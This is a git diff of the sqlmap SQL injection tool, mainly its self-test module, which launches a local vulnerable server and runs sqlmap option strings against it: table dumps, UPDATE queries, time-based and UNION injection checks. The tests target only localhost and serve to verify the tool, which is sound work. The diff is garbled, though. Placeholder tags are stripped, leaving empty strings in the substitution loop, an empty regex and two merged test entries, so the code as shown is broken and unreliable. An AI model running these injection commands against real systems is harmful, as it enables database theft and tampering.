kb.aliasName = randomStr(seed=hash(conf.hostname or "")) + +def _restoreMergedOptions(): """ - Restore command line options that could be possibly - changed during the testing of previous target. 
+ Restore merged options (command line, configuration file and default values) + that could be possibly changed during the testing of previous target. """ - conf.regexp = cmdLineOptions.regexp - conf.string = cmdLineOptions.string - conf.textOnly = cmdLineOptions.textOnly + + for option in RESTORE_MERGED_OPTIONS: + conf[option] = mergedOptions[option] def initTargetEnv(): """ @@ -505,23 +723,45 @@ def initTargetEnv(): if conf.cj: resetCookieJar(conf.cj) + threadData = getCurrentThreadData() + threadData.reset() + conf.paramDict = {} conf.parameters = {} conf.hashDBFile = None _setKnowledgeBaseAttributes(False) - _restoreCmdLineOptions() + _restoreMergedOptions() _setDBMS() if conf.data: - class _(unicode): + class _(six.text_type): pass - original = conf.data - conf.data = _(urldecode(conf.data)) - setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + kb.postUrlEncode = True + + for key, value in conf.httpHeaders: + if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): + kb.postUrlEncode = "urlencoded" in value + break + + if kb.postUrlEncode: + original = conf.data + conf.data = _(urldecode(conf.data)) + setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + kb.postSpaceToPlus = '+' in original + + if conf.data and unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST: + if '=' not in conf.data.strip('='): + try: + original = conf.data + conf.data = _(decodeBase64(conf.data, binary=False)) + setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + except: + pass - kb.postSpaceToPlus = '+' in original + match = re.search(INJECT_HERE_REGEX, "%s %s %s" % (conf.url, conf.data, conf.httpHeaders)) + kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR def setupTargetEnv(): _createTargetDirs() @@ -530,3 +770,4 @@ def setupTargetEnv(): _resumeHashDBValues() _setResultsFile() _setAuthCred() + _setAuxOptions() diff --git a/lib/core/testing.py b/lib/core/testing.py index 0b72fd39f9c..a8d3182680b 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -1,323 +1,314 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs import doctest +import logging import os +import random import re -import shutil +import socket +import sqlite3 import sys import tempfile +import threading import time -import traceback -from extra.beep.beep import beep -from lib.controller.controller import start +from extra.vulnserver import vulnserver from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout -from lib.core.common import getUnicode +from lib.core.common import randomInt from lib.core.common import randomStr -from lib.core.common import readXmlFile -from lib.core.data import conf +from lib.core.common import shellExec +from lib.core.compat import round +from lib.core.convert import encodeBase64 +from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.log import LOGGER_HANDLER -from lib.core.option import init -from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING -from lib.parse.cmdline import cmdLineParser - -failedItem = None -failedParseOn = None -failedTraceBack = None +from lib.core.data import queries +from lib.core.patch import 
unisonRandom +from lib.core.settings import IS_WIN -def smokeTest(): +def vulnTest(): """ - This will run the basic smoke testing of a program + Runs the testing against 'vulnserver' """ - retVal = True - count, length = 0, 0 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - for ifile in files: - length += 1 + TESTS = ( + ("-h", ("to see full list of options run with '-hh'",)), + ("--dependencies", ("sqlmap requires", "third-party library")), + ("-u --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")), + ("-u --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")), + (u"-c --flush-session --output-dir=\"\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")), + (u"-u --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --titles --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'", "~with --string",)), + ("-m --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")), + ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")), + ("-u \"&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)), + ("--list-tampers", ("between", "MySQL", "xforwardedfor")), + ("-r --flush-session -v 5 --test-skip=\"heavy\" --save=", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), + ("-c ", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")), + ("-l --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), + ("-l --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), + ("-u --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), + ("-u -p id --base64=id --data=\"base64=true\" --flush-session --banner --technique=B", ("banner: '3.",)), + ("-u -p id --base64=id --data=\"base64=true\" --flush-session --tables --technique=U", (" users ",)), + ("-u --flush-session --banner --technique=B --disable-precon --not-string \"no results\"", ("banner: '3.",)), + ("-u --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2", ("banner: '3.'",)), + ("-u --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), + ("-u --flush-session --technique=BU --data=\"{\\\"id\\\": 1}\" --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: UNION query", "banner: '3.")), + ("-u --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner 
--smart -v 5", ("might be injectable", "Payload: --flush-session --technique=BU --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har= --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: UNION query", "2 entries")), + ("-u --flush-session -H \"id: 1*\" --tables -t ", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), + ("-u --flush-session --banner --invalid-logical --technique=B --predict-output --titles --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")), + ("-u --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), + ("-u --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 30")), + ("-u --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)), + ("-u --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), + ("-u --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "27 entries", "6E616D6569736E756C6C")), + ("-u --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 31 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")), + ("-u --flush-session --technique=BU --all", ("30 entries", "Type: boolean-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), + ("-u -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")), + ("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), + ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), + ("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")), + ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)), + ("-u csrf --data=\"id=1&csrf_token=1\" --banner --answers=\"update=y\" --flush-session", ("back-end DBMS: SQLite", "banner: '3.")), + ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")), + ) - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue + retVal = True + count = 0 + cleanups = [] - for ifile in files: - if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": - path = os.path.join(root, os.path.splitext(ifile)[0]) - path = path.replace(paths.SQLMAP_ROOT_PATH, '.') - path = path.replace(os.sep, 
'.').lstrip('.') - try: - __import__(path) - module = sys.modules[path] - except Exception, msg: - retVal = False - dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) - logger.error(errMsg) - else: - # Run doc tests - # Reference: http://docs.python.org/library/doctest.html - (failure_count, test_count) = doctest.testmod(module) - if failure_count > 0: - retVal = False + while True: + address, port = "127.0.0.1", random.randint(10000, 65535) + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + if s.connect_ex((address, port)): + break + else: + time.sleep(1) + finally: + s.close() - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + def _thread(): + vulnserver.init(quiet=True) + vulnserver.run(address=address, port=port) - clearConsoleLine() - if retVal: - logger.info("smoke test final result: PASSED") - else: - logger.error("smoke test final result: FAILED") + vulnserver._alive = True - return retVal + thread = threading.Thread(target=_thread) + thread.daemon = True + thread.start() -def adjustValueType(tagName, value): - for family in optDict.keys(): - for name, type_ in optDict[family].items(): - if type(type_) == tuple: - type_ = type_[0] - if tagName == name: - if type_ == "boolean": - value = (value == "True") - elif type_ == "integer": - value = int(value) - elif type_ == "float": - value = float(value) + while vulnserver._alive: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.connect((address, port)) + s.sendall(b"GET / HTTP/1.1\r\n\r\n") + result = b"" + while True: + current = s.recv(1024) + if not current: + break + else: + result += current + if b"vulnserver" in result: break - return value - -def liveTest(): - """ - This will run the test of a program against the live testing environment - """ - global failedItem - global failedParseOn - global failedTraceBack - - retVal = True - count = 0 - global_ = {} - vars_ = {} - - livetests = readXmlFile(paths.LIVE_TESTS_XML) - length = len(livetests.getElementsByTagName("case")) - - element = livetests.getElementsByTagName("global") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - global_[child.tagName] = adjustValueType(child.tagName, child.getAttribute("value")) - - element = livetests.getElementsByTagName("vars") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - var = child.getAttribute("value") - vars_[child.tagName] = randomStr(6) if var == "random" else var - - for case in livetests.getElementsByTagName("case"): - console_output = False - count += 1 - name = None - parse = [] - switches = dict(global_) - value = "" - vulnerable = True - result = None + except: + pass + finally: + s.close() + time.sleep(1) + + if not vulnserver._alive: + logger.error("problem occurred in vulnserver instantiation (address: 'http://%s:%s')" % (address, port)) + return False + else: + logger.info("vulnserver running at 'http://%s:%s'..." 
% (address, port)) - if case.hasAttribute("name"): - name = case.getAttribute("name") + handle, config = tempfile.mkstemp(suffix=".conf") + os.close(handle) + cleanups.append(config) - if conf.runCase and ((conf.runCase.isdigit() and conf.runCase != count) or not re.search(conf.runCase, name, re.DOTALL)): - continue + handle, database = tempfile.mkstemp(suffix=".sqlite") + os.close(handle) + cleanups.append(database) - if case.getElementsByTagName("switches"): - for child in case.getElementsByTagName("switches")[0].childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - value = replaceVars(child.getAttribute("value"), vars_) - switches[child.tagName] = adjustValueType(child.tagName, value) + with sqlite3.connect(database) as conn: + c = conn.cursor() + c.executescript(vulnserver.SCHEMA) - if case.getElementsByTagName("parse"): - for item in case.getElementsByTagName("parse")[0].getElementsByTagName("item"): - if item.hasAttribute("value"): - value = replaceVars(item.getAttribute("value"), vars_) + handle, request = tempfile.mkstemp(suffix=".req") + os.close(handle) + cleanups.append(request) - if item.hasAttribute("console_output"): - console_output = bool(item.getAttribute("console_output")) + handle, log = tempfile.mkstemp(suffix=".log") + os.close(handle) + cleanups.append(log) - parse.append((value, console_output)) + handle, multiple = tempfile.mkstemp(suffix=".lst") + os.close(handle) + cleanups.append(multiple) - msg = "running live test case: %s (%d/%d)" % (name, count, length) - logger.info(msg) + content = "POST / HTTP/1.0\nUser-Agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) + with open(request, "w+") as f: + f.write(content) + f.flush() - try: - result = runCase(switches, parse) - except SqlmapNotVulnerableException: - vulnerable = False + content = '%d' % (port, encodeBase64(content, binary=False)) + with open(log, "w+") as f: + f.write(content) + f.flush() - test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING) - test_case_fd.write("%s\n" % name) + base = "http://%s:%d/" % (address, port) + url = "%s?id=1" % base + direct = "sqlite3://%s" % database + tmpdir = tempfile.mkdtemp() - if result is True: - logger.info("test passed") - cleanCase() - else: - errMsg = "test failed " + with open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))) as f: + content = f.read().replace("url =", "url = %s" % url) - if failedItem: - errMsg += "at parsing item \"%s\" " % failedItem + with open(config, "w+") as f: + f.write(content) + f.flush() - errMsg += "- scan folder: %s " % paths.SQLMAP_OUTPUT_PATH - errMsg += "- traceback: %s" % bool(failedTraceBack) + content = "%s?%s=%d\n%s?%s=%d\n%s&%s=1" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr()) + with open(multiple, "w+") as f: + f.write(content) + f.flush() - if not vulnerable: - errMsg += " - SQL injection not detected" + for options, checks in TESTS: + status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) + dataToStdout("\r[%s] [INFO] completed: %s" % (time.strftime("%X"), status)) - logger.error(errMsg) - test_case_fd.write("%s\n" % errMsg) + if IS_WIN and "uraj" in options: + options = options.replace(u"\u0161u\u0107uraj", "sucuraj") + checks = [check.replace(u"\u0161u\u0107uraj", "sucuraj") for check in checks] - if failedParseOn: - console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) - 
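# Illustrative sketch (not from the sqlmap source): the TESTS tuples above pair
# command line options with expected output fragments, and the evaluation a few
# lines below treats a leading '~' as a negative assertion (the fragment must NOT
# appear in the captured output). A minimal self-contained rendering of that
# convention, with invented sample output:

def checks_pass(output, checks):
    # '~'-prefixed checks must be absent from the output, all others present
    return all(
        (check[1:] not in output) if check.startswith('~') else (check in output)
        for check in checks
    )

assert checks_pass("banner: '3.36'", ("banner: '3.", "~unhandled exception"))
assert not checks_pass("unhandled exception was raised", ("~unhandled exception",))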
console_output_fd.write(failedParseOn) - console_output_fd.close() + for tag, value in (("", url), ("", base), ("", direct), ("", tmpdir), ("", request), ("", log), ("", multiple), ("", config), ("", url.replace("id=1", "id=MZ=%3d"))): + options = options.replace(tag, value) - if failedTraceBack: - traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) - traceback_fd.write(failedTraceBack) - traceback_fd.close() + cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) - beep() + if "" in cmd: + handle, tmp = tempfile.mkstemp() + os.close(handle) + cmd = cmd.replace("", tmp) - if conf.stopFail is True: - return retVal + output = shellExec(cmd) - test_case_fd.close() - retVal &= bool(result) + if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output: + dataToStdout("---\n\n$ %s\n" % cmd) + dataToStdout("%s---\n" % output, coloring=False) + retVal = False - dataToStdout("\n") + count += 1 + clearConsoleLine() if retVal: - logger.info("live test final result: PASSED") + logger.info("vuln test final result: PASSED") else: - logger.error("live test final result: FAILED") - - return retVal + logger.error("vuln test final result: FAILED") -def initCase(switches=None): - global failedItem - global failedParseOn - global failedTraceBack + for filename in cleanups: + try: + os.remove(filename) + except: + pass - failedItem = None - failedParseOn = None - failedTraceBack = None + return retVal - paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-") - paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") - paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") +def smokeTest(): + """ + Runs the basic smoke testing of a program + """ - logger.debug("using output directory '%s' for this test case" % paths.SQLMAP_OUTPUT_PATH) + unisonRandom() - cmdLineOptions = cmdLineParser() + with open(paths.ERRORS_XML, "r") as f: + content = f.read() - if switches: - for key, value in switches.items(): - if key in cmdLineOptions.__dict__: - cmdLineOptions.__dict__[key] = value + for regex in re.findall(r'', content): + try: + re.compile(regex) + except re.error: + errMsg = "smoke test failed at compiling '%s'" % regex + logger.error(errMsg) + return False - init(cmdLineOptions, True) + retVal = True + count, length = 0, 0 -def cleanCase(): - shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True) + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra", "interbase")): + continue -def runCase(switches=None, parse=None): - global failedItem - global failedParseOn - global failedTraceBack + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + length += 1 - initCase(switches) + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra", "interbase")): + continue - LOGGER_HANDLER.stream = sys.stdout = tempfile.SpooledTemporaryFile(max_size=0, mode="w+b", prefix="sqlmapstdout-") - retVal = True - handled_exception = None - unhandled_exception = None - result = False - console = "" - - try: - result = start() - except KeyboardInterrupt: - pass - except SqlmapBaseException, e: - handled_exception = e - except 
Exception, e: - unhandled_exception = e - finally: - sys.stdout.seek(0) - console = sys.stdout.read() - LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ - - if unhandled_exception: - failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) - retVal = None - elif handled_exception: - failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) - retVal = None - elif result is False: # this means no SQL injection has been detected - if None, ignore - retVal = False - - console = getUnicode(console, system=True) - - if parse and retVal: - with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f: - content = f.read() - - for item, console_output in parse: - parse_on = console if console_output else content - - if item.startswith("r'") and item.endswith("'"): - if not re.search(item[2:-1], parse_on, re.DOTALL): - retVal = None - failedItem = item - break + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename not in ("__init__.py", "gui.py"): + path = os.path.join(root, os.path.splitext(filename)[0]) + path = path.replace(paths.SQLMAP_ROOT_PATH, '.') + path = path.replace(os.sep, '.').lstrip('.') + try: + __import__(path) + module = sys.modules[path] + except Exception as ex: + retVal = False + dataToStdout("\r") + errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) + logger.error(errMsg) + else: + logger.setLevel(logging.CRITICAL) + kb.smokeMode = True - elif item not in parse_on: - retVal = None - failedItem = item - break + (failure_count, _) = doctest.testmod(module) - if failedItem is not None: - failedParseOn = console + kb.smokeMode = False + logger.setLevel(logging.INFO) - elif retVal is False: - failedParseOn = console + if failure_count > 0: + retVal = False - return retVal + count += 1 + status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) + dataToStdout("\r[%s] [INFO] completed: %s" % (time.strftime("%X"), status)) + + def _(node): + for __ in dir(node): + if not __.startswith('_'): + candidate = getattr(node, __) + if isinstance(candidate, str): + if '\\' in candidate: + try: + re.compile(candidate) + except: + errMsg = "smoke test failed at compiling '%s'" % candidate + logger.error(errMsg) + raise + else: + _(candidate) -def replaceVars(item, vars_): - retVal = item + for dbms in queries: + try: + _(queries[dbms]) + except: + retVal = False - if item and vars_: - for var in re.findall("\$\{([^}]+)\}", item): - if var in vars_: - retVal = retVal.replace("${%s}" % var, vars_[var]) + clearConsoleLine() + if retVal: + logger.info("smoke test final result: PASSED") + else: + logger.error("smoke test final result: FAILED") return retVal diff --git a/lib/core/threads.py b/lib/core/threads.py index 849da683fd4..7334560036a 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -1,24 +1,30 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import difflib +import sqlite3 import threading import time import traceback -from thread import error as threadError - +from lib.core.compat import WichmannHill +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.datatype import AttribDict from 
lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSkipTargetException from lib.core.exception import SqlmapThreadException +from lib.core.exception import SqlmapUserQuitException from lib.core.exception import SqlmapValueException from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import PYVERSION @@ -41,26 +47,37 @@ def reset(self): self.disableStdOut = False self.hashDBCursor = None self.inTransaction = False + self.lastCode = None self.lastComparisonPage = None self.lastComparisonHeaders = None - self.lastErrorPage = None + self.lastComparisonCode = None + self.lastComparisonRatio = None + self.lastPageTemplateCleaned = None + self.lastPageTemplate = None + self.lastErrorPage = tuple() self.lastHTTPError = None self.lastRedirectMsg = None self.lastQueryDuration = 0 + self.lastPage = None self.lastRequestMsg = None self.lastRequestUID = 0 + self.lastRedirectURL = tuple() + self.random = WichmannHill() self.resumed = False self.retriesCount = 0 self.seqMatcher = difflib.SequenceMatcher(None) self.shared = shared + self.technique = None + self.validationRun = 0 self.valueStack = [] ThreadData = _ThreadData() -def getCurrentThreadUID(): - return hash(threading.currentThread()) +def readInput(message, default=None, checkBatch=True, boolean=False): + # It will be overwritten by original from lib.core.common + pass -def readInput(message, default=None): +def isDigit(value): # It will be overwritten by original from lib.core.common pass @@ -69,8 +86,6 @@ def getCurrentThreadData(): Returns current thread's local data """ - global ThreadData - return ThreadData def getCurrentThreadName(): @@ -80,16 +95,22 @@ def getCurrentThreadName(): return threading.current_thread().getName() -def exceptionHandledFunction(threadFunction): +def exceptionHandledFunction(threadFunction, silent=False): try: threadFunction() except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True raise - except Exception, errMsg: - # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + except Exception as ex: + from lib.core.common import getSafeExString + + if not silent and kb.get("threadContinue") and not kb.get("multipleCtrlC") and not isinstance(ex, (SqlmapUserQuitException, SqlmapSkipTargetException)): + errMsg = getSafeExString(ex) if isinstance(ex, SqlmapBaseException) else "%s: %s" % (type(ex).__name__, getSafeExString(ex)) + logger.error("thread %s: '%s'" % (threading.currentThread().getName(), errMsg)) + + if conf.get("verbose") > 1 and not isinstance(ex, SqlmapConnectionException): + traceback.print_exc() def setDaemon(thread): # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation @@ -101,102 +122,144 @@ def setDaemon(thread): def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): threads = [] - kb.multiThreadMode = True + def _threadFunction(): + try: + threadFunction() + finally: + if conf.hashDB: + conf.hashDB.close() + + kb.multipleCtrlC = False kb.threadContinue = True kb.threadException = False - - if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)): - while True: - message = "please enter number of threads? 
[Enter for %d (current)] " % numThreads - choice = readInput(message, default=str(numThreads)) - if choice and choice.isdigit(): - if int(choice) > MAX_NUMBER_OF_THREADS: - errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS - logger.critical(errMsg) - else: - numThreads = int(choice) - break - - if numThreads == 1: - warnMsg = "running in a single-thread mode. This could take a while." - logger.warn(warnMsg) + kb.technique = ThreadData.technique + kb.multiThreadMode = False try: + if threadChoice and conf.threads == numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): + while True: + message = "please enter number of threads? [Enter for %d (current)] " % numThreads + choice = readInput(message, default=str(numThreads)) + if choice: + skipThreadCheck = False + + if choice.endswith('!'): + choice = choice[:-1] + skipThreadCheck = True + + if isDigit(choice): + if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: + errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS + logger.critical(errMsg) + else: + conf.threads = numThreads = int(choice) + break + + if numThreads == 1: + warnMsg = "running in a single-thread mode. This could take a while" + logger.warning(warnMsg) + if numThreads > 1: if startThreadMsg: infoMsg = "starting %d threads" % numThreads logger.info(infoMsg) else: - threadFunction() + try: + _threadFunction() + except (SqlmapUserQuitException, SqlmapSkipTargetException): + pass return + kb.multiThreadMode = True + # Start the threads for numThread in xrange(numThreads): - thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) + thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[_threadFunction]) setDaemon(thread) try: thread.start() - except threadError, errMsg: - errMsg = "error occured while starting new thread ('%s')" % errMsg + except Exception as ex: + errMsg = "error occurred while starting new thread ('%s')" % ex logger.critical(errMsg) break threads.append(thread) # And wait for them to all finish - alive = True - while alive: + while True: alive = False for thread in threads: - if thread.isAlive(): + if thread.is_alive(): alive = True - time.sleep(0.1) + break + if not alive: + break + time.sleep(0.1) - except KeyboardInterrupt: - print + except (KeyboardInterrupt, SqlmapUserQuitException) as ex: + print() + kb.prependFlag = False kb.threadContinue = False kb.threadException = True + if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1): + kb.multipleCtrlC = True + raise SqlmapUserQuitException("user aborted (Ctrl+C was pressed multiple times)") + + kb.lastCtrlCTime = time.time() + if numThreads > 1: - logger.info("waiting for threads to finish (Ctrl+C was pressed)") + logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: - while (threading.activeCount() > 1): - pass + while threading.active_count() > 1: + time.sleep(0.1) except KeyboardInterrupt: + kb.multipleCtrlC = True raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise - except (SqlmapConnectionException, SqlmapValueException), errMsg: - print + except (SqlmapConnectionException, SqlmapValueException) as ex: + print() kb.threadException = True - logger.error("thread %s: %s" % 
(threading.currentThread().getName(), errMsg)) + logger.error("thread %s: '%s'" % (threading.currentThread().getName(), ex)) - except: - from lib.core.common import unhandledExceptionMessage + if conf.get("verbose") > 1 and isinstance(ex, SqlmapValueException): + traceback.print_exc() - print - kb.threadException = True - errMsg = unhandledExceptionMessage() - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) - traceback.print_exc() + except Exception as ex: + print() + + if not kb.multipleCtrlC: + if isinstance(ex, sqlite3.Error): + raise + else: + from lib.core.common import unhandledExceptionMessage + + kb.threadException = True + errMsg = unhandledExceptionMessage() + logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + traceback.print_exc() finally: kb.multiThreadMode = False - kb.bruteMode = False kb.threadContinue = True kb.threadException = False + kb.technique = None for lock in kb.locks.values(): - if lock.locked_lock(): - lock.release() + if lock.locked(): + try: + lock.release() + except: + pass if conf.get("hashDB"): - conf.hashDB.flush(True) + conf.hashDB.flush() if cleanupFunction: cleanupFunction() diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py index a7645529299..21588a1892a 100644 --- a/lib/core/unescaper.py +++ b/lib/core/unescaper.py @@ -1,20 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend -from lib.core.data import conf from lib.core.datatype import AttribDict from lib.core.settings import 